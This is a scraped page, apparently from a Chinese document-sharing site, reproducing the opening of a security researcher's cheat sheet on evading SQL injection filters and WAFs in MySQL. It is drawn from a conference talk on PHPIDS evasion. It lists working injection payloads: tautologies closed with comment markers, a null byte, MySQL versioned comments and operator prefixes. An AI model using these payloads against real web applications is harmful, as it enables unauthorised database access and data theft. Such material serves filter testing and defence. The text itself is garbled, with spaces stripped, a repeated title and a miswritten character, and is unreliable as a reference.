waf绕过mysql注入waf绕过技巧脚本安全电脑资料

waf绕过 mysql注入waf绕过技巧脚本平安 电脑资料 This week I presented my experiences in SQLi filter evasion techniques

waf绕过mysql注入waf绕过技巧脚本平安电脑资料 ThisweekIpresentedmyexperiencesinSQLifilterevasion techniquesthatIhavegainedduring3yearsofPHPIDS filterevasionattheCONFidence2.0conference.Youcan findtheslideshere.Foraquickerreferenceyoucanuse thefollowingcheatsheet.Moredetailedexplainationcanbe foundintheslidesorinthetalk(videoshouldeonline inafewweeks). Basicfilter Comments ‘or1=1# ‘or1=1–- ‘or1=1/*(MySQL<5.1) ‘or1=1;%00 ‘or1=1unionselect1,2as` ‘or#newline 1=’1 ‘or–-newline 1=’1 ‘/*!50000or*/1=’1 ‘/*!or*/1=’1 Prefixes +–~! ‘or–+2=--!!!’2 Operators